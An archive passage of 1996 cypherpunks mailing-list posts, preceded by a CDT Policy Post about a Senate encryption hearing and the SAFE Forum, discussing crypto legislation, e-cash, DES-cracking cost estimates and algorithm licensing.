Subcommittee encryption hearing on Wednesday June 26.

The "cybercast" will provide netizens concerned about privacy and security
on the Internet the ability to participate in the hearing, ask questions of
the witnesses, and submit comments for the record.  Details on how you can
participate are printed below.

This hearing is the second encryption hearing held before the Senate
Subcommittee on Science, Space and Technology; the first hearing was held
on June 12.  Subcommittee Chair Sen. Conrad Burns (R-MT) presided over both
hearings.

Witnesses scheduled to testify at the hearing, which will focus on the
Burns/Leahy Pro-CODE bill (S. 1726) include:

* Phil Zimmermann, Inventor of PGP
* Whit Diffie, Father of Public-Key Cryptography
* Jerry Berman, Executive Director, Center for Democracy and Technology
* Matt Blaze, Cryptographer
* Phil Karn, Cryptographer
* Barbara Simons, Chair of US Public Policy Committee, ACM
* Marc Rotenberg, Director, Electronic Privacy Information Center
* AND YOU!! (See below for details)

The hearing will focus on the need to reform US encryption policies,
proposals to relax export controls on encryption, and the privacy issues
raised by the current policy.  Specific information on the schedule,
including approximate times the witnesses will testify, will be posted
within the next few days at the URLs listed below.

HOW TO JOIN THE HEARING LIVE ONLINE

The following sites contain detailed information on how you can
participate. Please visit these sites often for the latest information:

* http://www.senate.gov/~burns/crypto.htm
* http://www.crypto.com/
* http://www.cdt.org/crypto/
* http://www.hotwired.com/wiredside/
* http://www.digex.net/crypto/

INSTRUCTIONS:  On Wednesday June 26, 1996, between 9:00 am ET and 1:00
               pm ET, point your web browser at:

                   http://www.hotwired.com/wiredside/

WHAT YOU NEED: You will need to have RealAudio properly installed on
               your computer in order to participate in this event.  You

               can download RealAudio software *FREE* by visiting
               (http://www.realaudio.com/)

               All netizens with realauido capabilities can listen to
               the hearing live online. In order to participate in the
               accompaning chat session (and to ask questions of the
               witnesses) you will need to be a member of HotWired.
               Membership is *FREE*! Visit http://www.hotwired.com/ for
               details.
________________________________________________________________________

TELL CONGRESS WHY ENCRYPTION IS IMPORTANT TO YOU - ADD YOUR VOICE TO THE
CONGRESSIONAL RECORD

Senator Burns, Senator Patrick Leahy (D-VT) and the other sponosors of the
Pro-CODE bill want to hear from the Net.community about why encryption is
important to privacy and security on the Internet.

Please be sure to visit http://www.crypto.com/ and add your voice to the
debate over encryption policy on Capitol Hill.  Responses will be tabulated
and the results, along with selected statements, will be included in the
Congressional Record by Senator Conrad Burns.  The restults will also be
featured during the Security and Freedom through Encryption Forum (SAFE) on
July 1 (details on that event are attached below).

To add your voice to the crypto debate in Congress, visit:

   http://www.crypto.com/submit/

________________________________________________________________________

ATTEND THE SAFE FORUM - JULY 1, 1996 STANFORD CALIFORNIA

On July 1, 1996, in the heart of California's Silicon Valley at Stanford
University, members of Congress, prominent computer industry leaders and
privacy advocates will meet to discuss the need to reform U.S. encryption
policy.

The event is FREE and open to the public, but space is limited and is going
fast.  To find out more, and to reserve your free ticket, visit the SAFE
Forum Web Page at:

  http://www.crypto.com/safe/

CONFIRMED SPEAKERS INCLUDE:

Among other prominant industry leaders, cryptographers, privacy advocates
and members of Congress, confirmed speakers include:

Industry Leaders and Cryptographers        Members of Congress

* Marc Andreeson, Netscape                 * Rep. Anna Eshoo (D-CA)
* Jim Bidzos, RSA                          * Rep. Tom Campbell (R-CA)
* Eric Schmidt, Sun Microsystems           * Rep. Zoe Lofgren (D-CA)
* Brad Silverberg, Microsoft               * Sen. Conrad Burns (R-MT)
* Phil Zimmermann, PGP Inc                 * Sen. Patrick Leahy (D-VT)
* Matt Blaze, AT&T                         * Sen. Larry Pressler (R-SD)
* Bruce Schneier, Counterpane Systems

Privacy Advocates and Legal Experts:

* Michael Froomkin, U. of Miami Law School
* Jerry Berman, Center for Democracy and Technology
* Grover Norquist, Americans for Tax Reform (invited)
* Ken Dam, U. of Chicago Law School (invited)

This event will be "cybercast", whith full audio and still video clips,
live online with the help of MediaCast.  Details on the cybercast are
available at http://www.crypto.com/safe/

SAFE FORUM SPONSORS

This important discussion on the need for an alterative policy to protect
privacy and security and promote commerce on the Global Information
Infrastructure is being made possible by the generous support of the
following companies and public interest organizations:

America Online
Americans for Tax Reform
AT&T
Business Software Alliance
Center for Democracy and Technology
Center for National Security Studies
Commercial Internet eXchange
CompuServe Incorporated
Computer Professionals for Social Responsibility
Cylink Corporation
EDS
Electronic Frontier Foundation
Electronic Messaging Association
Electronic Privacy Information Center
Information Technology Association of America
IEEE - USA
MediaCast
Media Institute
Microsoft Corporation
Netcom Online Communication Services
Netscape Communications Corporation
Novell, Inc.
Oracle Corporation
Pacific Telesis
PGP Inc.
Prodigy, Inc.
Progress and Freedom Foundation
Securities Industry Association
Software Publishers Association
Sybase, Inc.
Voters Telecommunications Watch
Wired Magazine

Please visit the SAFE Forum Home Page for more information.
(http://www.crypto.com/safe/)

------------------------------------------------------------------------
(4) SUBSCRIPTION INFORMATION

Be sure you are up to date on the latest public policy issues affecting
civil liberties online and how they will affect you! Subscribe to the CDT
Policy Post news distribution list.  CDT Policy Posts, the regular news
publication of the Center For Democracy and Technology, are received by
nearly 10,000 Internet users, industry leaders, policy makers and
activists, and have become the leading source for information about
critical free speech and privacy issues affecting the Internet and other
interactive communications media.

To subscribe to CDT's Policy Post list, send mail to

     policy-posts-request@cdt.org

with a subject:

     subscribe policy-posts

If you ever wish to remove yourself from the list, send mail to the
above address with a subject of:

     unsubscribe policy-posts

-----------------------------------------------------------------------
(5) ABOUT THE CENTER FOR DEMOCRACY AND TECHNOLOGY/CONTACTING US

The Center for Democracy and Technology is a non-profit public interest
organization based in Washington, DC. The Center's mission is to develop
and advocate public policies that advance democratic values and
constitutional civil liberties in new computer and communications
technologies.

Contacting us:

General information:  info@cdt.org
World Wide Web:       URL:http://www.cdt.org/
FTP                   URL:ftp://ftp.cdt.org/pub/cdt/

Snail Mail:  The Center for Democracy and Technology
             1634 Eye Street NW * Suite 1100 * Washington, DC 20006
             (v) +1.202.637.9800 * (f) +1.202.637.0968

-----------------------------------------------------------------------
End Policy Post 2.25                                            6/21/96
-----------------------------------------------------------------------






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Sat, 22 Jun 1996 10:25:51 +0800
To: jim bell <jimbell@pacifier.com>
Subject: Re: Sen. Specter and Kerry move to delay crypto legislation
In-Reply-To: <199606211849.LAA04215@mail.pacifier.com>
Message-ID: <Pine.SUN.3.93.960621170212.3961B-100000@polaris>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 21 Jun 1996, jim bell wrote:

> [rest of letter to Leahy deleted]

> Since "everybody" is supposed to agree that the Leahy encryption bill is 
> dead, dead, dead, I don't see this as being any kind of problem.  It was 
> disliked by Clinton and the Denning-types, and with the exception of a short 
> flurry of mistaken optimism around here, it was roundly excoriated here as 
> well.  

To which which Leahy Bill are you referring?

> Jim Bell
> jimbell@pacifier.com

---
My preferred and soon to be permanent e-mail address:unicorn@schloss.li
"In fact, had Bancroft not existed,       potestas scientiae in usu est
Franklin might have had to invent him."    in nihilum nil posse reverti
00B9289C28DC0E55  E16D5378B81E1C96 - Finger for Current Key Information
Opp. Counsel: For all your expert testimony needs: jimbell@pacifier.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Sat, 22 Jun 1996 10:58:02 +0800
To: John Young <jya@pipeline.com>
Subject: Re: Cash Is Dying
In-Reply-To: <199606141129.LAA29891@pipe3.ny2.usa.pipeline.com>
Message-ID: <Pine.SUN.3.93.960621172722.3961C-100000@polaris>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 14 Jun 1996, John Young wrote:

>    6-14-96: NYT ad for The New York Times Magazine: 
>  
>  
>    Cash is dirty. 
>  
>    Cash is heavy. 
>  
>    Cash is quaint. 
>  
>    Cash is expensive. 
>  
>    CASH IS DYING. 

Someone stole my article.
---
My preferred and soon to be permanent e-mail address:unicorn@schloss.li
"In fact, had Bancroft not existed,       potestas scientiae in usu est
Franklin might have had to invent him."    in nihilum nil posse reverti
00B9289C28DC0E55  E16D5378B81E1C96 - Finger for Current Key Information
Opp. Counsel: For all your expert testimony needs: jimbell@pacifier.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Sat, 22 Jun 1996 12:02:09 +0800
To: jim bell <jimbell@pacifier.com>
Subject: Re: Sen. Specter and Kerry move to delay crypto legislation
In-Reply-To: <199606212219.PAA15671@mail.pacifier.com>
Message-ID: <Pine.SUN.3.93.960621181926.3961D-100000@polaris>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 21 Jun 1996, jim bell wrote:

> At 05:03 PM 6/21/96 -0400, Black Unicorn wrote:
> >On Fri, 21 Jun 1996, jim bell wrote:
> >> Since "everybody" is supposed to agree that the Leahy encryption bill is 
> >> dead, dead, dead, I don't see this as being any kind of problem.  It was 
> >> disliked by Clinton and the Denning-types, and with the exception of a short 
> >> flurry of mistaken optimism around here, it was roundly excoriated here as 
> >> well.  
> >
> >To which which Leahy Bill are you referring?
> 
> The one introduced on February 26, 1996.

I think the above message was refering to "procode" however.

> Jim Bell
> jimbell@pacifier.com
> 

---
My preferred and soon to be permanent e-mail address:unicorn@schloss.li
"In fact, had Bancroft not existed,       potestas scientiae in usu est
Franklin might have had to invent him."    in nihilum nil posse reverti
00B9289C28DC0E55  E16D5378B81E1C96 - Finger for Current Key Information
Opp. Counsel: For all your expert testimony needs: jimbell@pacifier.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Sat, 22 Jun 1996 18:27:33 +0800
To: se7en <cypherpunks@toad.com
Subject: Re: Science Lessons in the Mountains of New Mexico
Message-ID: <adf0a1270a0210049374@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 8:39 PM 6/21/96, se7en wrote:
>Cryptography may not academic science's only contribution to making
>business work in an unpredictable, technology-driven world. If a growing
>community of natural scientists, social scientists, and business
>theorists are right, then the cryptographic algorithms taht make
>electronic transactions secure will soon seem downright prosaic.
>
>This unusual admixture of pure researchers and real-world practitioners
>tends to congregate around research institutions in New Mexico, which has
>been a scientific hotbed ever since the atomic bomb project of the 1940s.
...


Se7en,

I am curious. Did you write this, or is this a forwarded article?

If you wrote this, it is very typical of journalistic treatments, and is
well-written. You have a career in journalism ahead of you (or perhaps you
currently are a journalist, under another name, in which case you should
still indicate what your actual journalistic name is, as I doubt you write
under the name "se7en."

If you did not write this, then you need to start including indications
about who did write it, and where it appeared, and that it's a forwarded
article.


--Tim May


Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Sat, 22 Jun 1996 12:49:40 +0800
To: jim bell <jimbell@pacifier.com>
Subject: Re: Sen. Specter and Kerry move to delay crypto legislation
In-Reply-To: <199606212303.QAA18192@mail.pacifier.com>
Message-ID: <Pine.SUN.3.93.960621190453.17997B-100000@polaris>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 21 Jun 1996, jim bell wrote:

> At 06:19 PM 6/21/96 -0400, Black Unicorn wrote:
> >On Fri, 21 Jun 1996, jim bell wrote:
> 
> >> >> Since "everybody" is supposed to agree that the Leahy encryption bill is 

> >> >To which which Leahy Bill are you referring?
> >> 
> >> The one introduced on February 26, 1996.
> >
> >I think the above message was refering to "procode" however.

> Certainly not by name.  It merely referred to legislation that Leahy "sponsored." 
>  Leahy _did_ seem to act like he was in favor of the Burns bill, as well,  
> after ECPA got the bad press, and maybe he's a co-sponsor of the Procode 
> bill as well.  Even so, the letter did not appear to be CC:'d to Burns, so I 
> conclude that it was intended to refer to at least the ECPA, if not both bills.  

Specter wrote to Leahy because the two of them get along well.  (Recall
the Clipper hearings for example) and because Specter and Burns do not.

It may also explain things to realize that Leahy wrote the circular asking
for other Senators to support the bill.  Specter is probably responding to
that.

Leahy's office has been the point unit for crypto initatives because their
legal staff are the only ones who really understand what is going on or
are able to answer questions intelligently.

Be careful with your assumptions and take replies to e-mail please.

> 
> Jim Bell
> jimbell@pacifier.com
> 

---
My preferred and soon to be permanent e-mail address:unicorn@schloss.li
"In fact, had Bancroft not existed,       potestas scientiae in usu est
Franklin might have had to invent him."    in nihilum nil posse reverti
00B9289C28DC0E55  E16D5378B81E1C96 - Finger for Current Key Information
Opp. Counsel: For all your expert testimony needs: jimbell@pacifier.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Rosoff <drosoff@arc.unm.edu>
Date: Sat, 22 Jun 1996 18:04:00 +0800
To: William Knowles <jimbell@pacifier.com>
Subject: Re: Federal Key Registration Agency
Message-ID: <1.5.4.16.19960622015728.32e7eb0e@arc.unm.edu>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

At 03.05 AM 6/21/96 -0700, William Knowles wrote:
>On Thu, 20 Jun 1996, jim bell wrote:

>> If done in parallel, on a dedicated, 200 MHz custom chip, my WAG says that 
>> such a chip could try, and statistically analyze the results of 10 million 
>> DES codes per second.   (it would do the decrypts on a number of parallel 
>> DES blocks, and look for typical ASCII code pattern probabilities, again all 
>> in parallel.)  A typical cracking system might have 100 boards of 100 such 
>> chips, or perhaps a 100 billion such decrypts per second.  Checking the 
>> keyspace would require 2**19 seconds, or about a half million seconds, or 6 
>> days.  Average decrypt, of course, in 3 days.

Wasn't there a crypto paper three or four years ago that said if custom chips
were used, a million dollar custom machine could crack a DES key in less
than a day?

===============================================================================
David Rosoff (nihongo o sukoshi dekiru)  ---------------->  drosoff@arc.unm.edu
For PGP key 0xD37692F9, finger drosoff@acoma.arc.unm.edu
0xD37692F9  Key fingerprint =  25 7D AA 01 85 41 43 89  50 5A 33 76 F1 F1 99 67
Non-technical beginner's guide to PGP ---> http://www.arc.unm.edu/~drosoff/pgp/
Anonymous ok, PGP ok.  If it's not PGP-signed, you know that I didn't write it.
=== === === === === === === === === === === === === === === === === === === ===
"Truth is stranger than fiction, especially when truth is being defined by the
O.J. Simpson Defense Team." -Dave Barry

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMctQlxguzHDTdpL5AQE0MgP9GAtJIBZRhV+VIIqiojiZsO5qz3vqN3xe
5UQ0W1uRxZgckLOs5h57/IiDhAGTwzoB1x4pOKlbsp/Pv2zgDNl5hTAUJiQIKpHX
vdcyJBUYRUCCfHuZfRxXVeEhhWMzSowLvWNVyapLSwFo6exY1ozMgcchy1YSx1sd
kEpJtlUegiE=
=MfyQ
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Sat, 22 Jun 1996 18:11:53 +0800
To: Michael Froomkin <froomkin@law.miami.edu>
Subject: Re: Cash Is Dying
In-Reply-To: <Pine.SUN.3.94.960621221335.28317A-100000@viper.law.miami.edu>
Message-ID: <Pine.SUN.3.93.960621221236.930A-100000@polaris>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 21 Jun 1996, Michael Froomkin wrote:

> On Fri, 21 Jun 1996, Black Unicorn wrote:
> 
> > On Fri, 14 Jun 1996, John Young wrote:
> > 
> > >    6-14-96: NYT ad for The New York Times Magazine: 
> > 
> > Someone stole my article.
> > ---
> 
> It was an ok article, but if failed to talk about the privacy costs of
> ecash schemes currently on offer.

His or mine?  :)

> 
> A. Michael Froomkin        | +1 (305) 284-4285; +1 (305) 284-6506 (fax)
> Associate Professor of Law | 
> U. Miami School of Law     | froomkin@law.miami.edu
> P.O. Box 248087            | http://www.law.miami.edu/~froomkin
> Coral Gables, FL 33124 USA | It's hot here.  And humid.
> 

---
My preferred and soon to be permanent e-mail address:unicorn@schloss.li
"In fact, had Bancroft not existed,       potestas scientiae in usu est
Franklin might have had to invent him."    in nihilum nil posse reverti
00B9289C28DC0E55  E16D5378B81E1C96 - Finger for Current Key Information
Opp. Counsel: For all your expert testimony needs: jimbell@pacifier.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael Froomkin <froomkin@law.miami.edu>
Date: Sat, 22 Jun 1996 18:22:44 +0800
To: Black Unicorn <unicorn@schloss.li>
Subject: Re: Cash Is Dying
In-Reply-To: <Pine.SUN.3.93.960621172722.3961C-100000@polaris>
Message-ID: <Pine.SUN.3.94.960621221335.28317A-100000@viper.law.miami.edu>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 21 Jun 1996, Black Unicorn wrote:

> On Fri, 14 Jun 1996, John Young wrote:
> 
> >    6-14-96: NYT ad for The New York Times Magazine: 
> 
> Someone stole my article.
> ---

It was an ok article, but if failed to talk about the privacy costs of
ecash schemes currently on offer.

A. Michael Froomkin        | +1 (305) 284-4285; +1 (305) 284-6506 (fax)
Associate Professor of Law | 
U. Miami School of Law     | froomkin@law.miami.edu
P.O. Box 248087            | http://www.law.miami.edu/~froomkin
Coral Gables, FL 33124 USA | It's hot here.  And humid.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nelson@crynwr.com
Date: Sat, 22 Jun 1996 12:20:26 +0800
To: cypherpunks@toad.com
Subject: Re: Cash Is Dying
In-Reply-To: <199606141129.LAA29891@pipe3.ny2.usa.pipeline.com>
Message-ID: <19960621223557.21390.qmail@ns.crynwr.com>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 14 Jun 1996, John Young wrote:

>    6-14-96: NYT ad for The New York Times Magazine: 
>  
>  
>    Cash is dirty. 
>  
>    Cash is heavy. 
>  
>    Cash is quaint. 
>  
>    Cash is expensive. 
>  
>    CASH IS DYING. 

Cash is anonymous.

-russ <nelson@crynwr.com>    http://www.crynwr.com/~nelson
Crynwr Software sells packet driver support     | PGP ok
521 Pleasant Valley Rd. | +1 315 268 1925 voice | Corporations persuade;
Potsdam, NY 13676       | +1 315 268 9201 FAX   | governments coerce.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Sat, 22 Jun 1996 21:40:34 +0800
To: cypherpunks@toad.com
Subject: Re: Federal Key Registration Agency
Message-ID: <199606220714.AAA25885@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


>Michael Froomkin writes:
>> I have seen the text of the speech.  The wire service accounts wildly,
>> wildly exaggerate.  This is a non-story...except for AG Reno's assertion
>> that it would take the government a year to break one DES message with a
>> "supercomputer".  She presumably believes this.  ....

At 07:54 AM 6/21/96 -0400, Perry wrote:
>The numbers in the Blaze et al paper are very realistic on this. A
>year is total bull -- not even within several orders of magnitude of
>accuracy.

Actually, it may even be low - Cray-type supercomputers aren't particularly
designed for the bit-twiddling you need to do DES well.  An application-
specific cracking machine can do it several orders of magnitude faster
for a smaller amount of money.  Wiener's design was two orders of magnitude
more cost-effective than the two previous designs (Peter Wayner's content-
addressible-memory design and somebody-from-DEC's GaAs chip design were
both about $50M for a 1-day crack), and those were substantial breakthroughs
when they came out.  

But yes, she's giving out very misleading numbers for what cracking DES 
really costs, and I'd assume she's way too competent to be doing so
by accident - or at least she should be...

As far as Jim Bell's cracking cost estimates go, a Wiener-style machine
would cost about $1M for a 3.5-hour crack, or about 7 keys per day
with known plaintext.  If the on-chip penalty for detecting probable patterns
instead of specific ones is small (e.g. first cut is to accept keys which
have all the high-bits zero, which is 1/256 of the total), you should be
able to do better than three days per crack, especially if it's also not
too expensive to haul the key-schedule out of the chip on the 1/256 hits.
Double the cost if you think there's a random initialization vector,
and do other minor annoying things to the chip design if you're checking
for several popular known plaintexts and other creeping featurism,
and you're still close.  You may be willing to feed the hits from the
first round set of crunching into a more normal computer as well...

#				Thanks;  Bill
# Bill Stewart +1-415-442-2215 stewarts@ix.netcom.com
# http://www.idiom.com/~wcs
#				Dispel Authority!





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Yap Remailer <remailer@yap.pactitle.com><x@x.x>
Date: Sat, 22 Jun 1996 21:22:24 +0800
To: cypherpunks@toad.com
Subject: Re: Sen. Specter and Kerry move to delay crypto legislation
In-Reply-To: <Pine.SUN.3.91.960621065022.12815F-100000@eff.org>
Message-ID: <199606220715.AAA18944@yap.pactitle.com>
MIME-Version: 1.0
Content-Type: text/plain


In article <Pine.SUN.3.91.960621065022.12815F-100000@eff.org> Declan McCullagh <declan@eff.org> writes:

Don't confuse Kerry and Kerrey.  This was not Kerry from
Massachusetts.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Sat, 22 Jun 1996 21:51:10 +0800
To: "geeman@best.com>
Subject: Re: FW: Bashing "Wired"
Message-ID: <199606220824.BAA26718@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


At 09:32 AM 6/21/96 -0700, you wrote:
>And notice that increasingly the "journalists" are the quoted thinkers and
>strategists in important areas? Someone majors in English, starts writing
>for "Netizen" or "HotWired," and the next thing you know they're debating
>crypto policy with Conrad Burns and Dorothy Denning. We're in an age where
>the medium truly is the message

You don't think the rest of the press is truly any better, do you?
At least on the net, you get to see the horse's mouth on a bad day,
and sometimes you can even meet the people and track down the rumors 
hat eventually become headlines, and pull the wool over your own eyes.

Dorothy Denning may know a lot of mathematics about cryptography, 
but that doesn't make her any more fit to decide what policies the 
government ought to enforce than I am.  She'll get the 
technical details correct far more often than Senator Burns,
as would most people here, but being a trained ethicist would perhaps
be more relevant than being a trained mathematician - it doesn't take
that much technical explanation to know that crypto lets you have
private conversations.


#				Thanks;  Bill
# Bill Stewart +1-415-442-2215 stewarts@ix.netcom.com
# http://www.idiom.com/~wcs
#				Dispel Authority!





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Sat, 22 Jun 1996 21:47:22 +0800
To: ogren@cris.com
Subject: Re: Win95 Blowfish Implementation
Message-ID: <199606220824.BAA26724@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


>So correct me if any of the following statements are incorrect:
>1. Blowfish is not patented and can be used without royalty.

According to Schneier's book (which should be authoritative,
since it's his algorithm), the algorithm is unpatented
and the C code in the back of the book is public domain.

>2. SHA can be used without royalty.
Yup.  Use SHA-1 rather than the original SHA, though; the NSA
"updated" it in ways that do appear to strengthen it.

>3. MD5 can be used without royalty if the RSAREF library is used, 
>and if the proper credit is given to RSA.
>Also, can the MD5 algorithm be used outside the RSAREF library?  In 
>other words, can I rewrite the code to take in effect MFC classes?

Yeah.  I think there's even an RFC that comments on it.

#				Thanks;  Bill
# Bill Stewart +1-415-442-2215 stewarts@ix.netcom.com
# http://www.idiom.com/~wcs
#				Dispel Authority!





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: snow <snow@smoke.suba.com>
Date: Sat, 22 Jun 1996 21:36:51 +0800
To: nelson@crynwr.com
Subject: Re: Cash Is Dying
In-Reply-To: <19960621223557.21390.qmail@ns.crynwr.com>
Message-ID: <Pine.LNX.3.93.960622020457.630A-100000@smoke.suba.com>
MIME-Version: 1.0
Content-Type: text/plain


On 21 Jun 1996 nelson@crynwr.com wrote:
> On Fri, 14 Jun 1996, John Young wrote:
> >    6-14-96: NYT ad for The New York Times Magazine: 
> >    Cash is dirty. 
> >    Cash is heavy. 
> >    Cash is quaint. 
> >    Cash is expensive. 
> >    CASH IS DYING. 
> Cash is anonymous.

	And will remain as long as it still is. E-cash is a great idea,
and I hope to see it _really_ working soon, but it will not be anonymous
anytime in the forseable future.

	Also, people won't trust it. Not the people that read this list, I
trust some of the people here, and if they say it works, I trust that. Not
just one, but _all_ of the group I trust. No, people like my parents and
other relatives. People smart enough to read the papers, and smart enough
not to trust everything the "experts" say. 

	Cash is easy, cash is plentiful, you can hold cash in your hand
and KNOW that you have it.

Petro, Christopher C.
petro@suba.com <prefered for any non-list stuff>
snow@crash.suba.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Deranged Mutant" <WlkngOwl@unix.asb.com>
Date: Sat, 22 Jun 1996 21:47:57 +0800
To: se7en <se7en@dis.org>
Subject: Re: Science Lessons in the Mountains of New Mexico
Message-ID: <199606220915.FAA16203@unix.asb.com>
MIME-Version: 1.0
Content-Type: text/plain


So where did you get this promotional hype? At least quote your 
sources. (Or did you write this?)

The tone of that piece sounds like an advert telling me to invest $$$ 
into Santa Fe Inst.

On 21 Jun 96 at 13:39, se7en wrote:
[..]
> The current thinkers are looking into not just mathematical complexity, 
> but complexity itself. Complexity theory. Complex systems of any 
> definition--the weather, perhaps, or the human immune system, or the 
> organizational behavior of insects--and how their workings and 
> adaptations might hold lessons for other fields, not least business.
[..]

Methinks "Complexity theory" (aka Dynamical Systems Theory) is 
wonderful hype to get research grants.  Certain people think by 
throwing money into this area that they can predict better, when much 
of theory deals with how these systems *cannot* be well predicted in 
*some* areas of behavior.  Other people over-mystify the complexity of 
a system and declare *nothing* can be predicted, of course.

Something akin to 60s-70s electrical utility exces bragging to each 
other on golf courses about how they own nuke plants.  Hip thing now 
is for the company to invest in research or use methods based on 
"Chaos Theory"... you'll be really cool at parties if you drop those 
words to people. Any form of analysis that uses lots of variables 
gets labelled as having to do with "Chaos Theory" and the research 
grants grow, even though it may not deal with those variables as a 
*dynamic system*. Substance though?

Not that studies in compelx systems are useless. By far the opposite.
(though the question of useful to *who* is important.  Using chaos 
theory to enhance methods of central control rather than allowing 
emergent behaviors is one downside of what some people are looking to 
the Santa Fe institute for.)

Other than noting crypto in the first paragraph and mentioning 
SmartCards, what does this have to do with crypto and socio- 
political implications of widespread use of crypto?

ObCrypto: similarities in literature on chaos theory and 
cryptanlysis.  I've seens refs to using various forms of chaotic 
equations or cellular automata for crypto, but most of the writers 
seem ignorant of any crypto-literature (never mentioning that 
Wolfram's PRNG is crackable, for instance). 

Backburner Idea: if all 1D CA's are equivalent to LFSRs, and if [need 
to find refs to this alleged proof] all 2+D CA's have an equivalent 
1D CA, then if a crypto algorithm can be duplicated as a CA...

Alas I ramble on about ideas which I am not an expert at...

Rob.


---
No-frills sig.
Befriend my mail filter by sending a message with the subject "send help"
Key-ID: 5D3F2E99 1996/04/22 wlkngowl@unix.asb.com (root@magneto)
        AB1F4831 1993/05/10 Deranged Mutant <wlkngowl@unix.asb.com>
Send a message with the subject "send pgp-key" for a copy of my key.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Sun, 23 Jun 1996 06:14:21 +0800
To: Bill Stewart <cypherpunks@toad.com
Subject: Re: Federal Key Registration Agency
Message-ID: <199606221648.JAA25376@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 12:09 AM 6/22/96 -0700, Bill Stewart wrote:

>Actually, it may even be low - Cray-type supercomputers aren't particularly
>designed for the bit-twiddling you need to do DES well.  An application-
>specific cracking machine can do it several orders of magnitude faster
>for a smaller amount of money.  Wiener's design was two orders of magnitude
>more cost-effective than the two previous designs (Peter Wayner's content-
>addressible-memory design and somebody-from-DEC's GaAs chip design were
>both about $50M for a 1-day crack), and those were substantial breakthroughs
>when they came out.  

It would be foolish to use GaAs to build a DES-cracker.  If there's one 
thing we've learned from the fact that microcomputers have "won" against 
mainframes, and massively-parallel computers have "won" against super-speed 
scalars, it is that it is much, much cheaper to build 10 transistors of 
speed "1", than 1 transistor at speed "10."  Presumably, they can get the 
same amount of work done.

The main thing that kept vector (parallel) machines back in the 70's and 
80's was the problem of subdividing programming tasks into hundreds or 
thousands of such tasks, suitable for such a machine.  That "problem" is no 
problem at all for DES cracking, since trying large numbers of codes is 
inherently a decomposable problem.

It seems likely that the most economical solution would be to build the 
cracker on a not-quite state-of-the-art fab, say a 0.5 micron facility, 
purchased from some semiconductor company who has one too many old fabs.  
The costs of the hardware would be amortized already, and the product would 
be sufficiently fast to help minimize the parallelism required.

Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Declan McCullagh <declan@eff.org>
Date: Sun, 23 Jun 1996 06:36:02 +0800
To: cypherpunks@toad.com
Subject: IAG: "Non-violent demonstrations" planned after Net-attacks
Message-ID: <Pine.SUN.3.91.960622095337.25469C-100000@eff.org>
MIME-Version: 1.0
Content-Type: text/plain


I subscribed to the IAG list and there's not much (or anything) happening
on it so far, but the idea has potential. Here's how to join if you're
interested. 

-Declan


// declan@eff.org // I do not represent the EFF // declan@well.com //


---------- Forwarded message ----------
Date: Fri, 21 Jun 1996 11:13:57 -0700 (PDT)
From: Marilyn Davis <madavis@deliberate.com>
To: iag@deliberate.com
Subject: For forwarding: IAG Invitation

  Alabama, Australia, Belgium, California, China, Connecticut, Florida,
  France, Georgia, Germany, Illinois, India, Indonesia, Italy, Jordan,
  Kansas, Malaysia, Maryland, Massachusetts, Montana, New Jersey, New
  York, Oklahoma, Oregon, Pennsylvania, Russia, Saudi Arabia, Singapore,
  South Korea, Sweden, Turkey, United Arab Emirates, U.S., Viet Nam,
  Virginia, and Washington.

 
 ** INTERNET UNDER ATTACK BY LOCAL AND NATIONAL GOVERNMENTS EVERYWHERE **
 
 
                           Fight Back!!
 
 
 Join the Internet Action Group gathering now on the email list:
 iag@deliberate.com.
 
 We will organize simultaneous local non-violent demonstrations at
 coordinated sites around the world in response to local and national
 attacks on the internet.
 
 Our list has new technology for polling ourselves so we can plan
 our actions democratically.
 
 To join the IAG, send a message to majordomo@deliberate.com.  Your
 message should say:
 
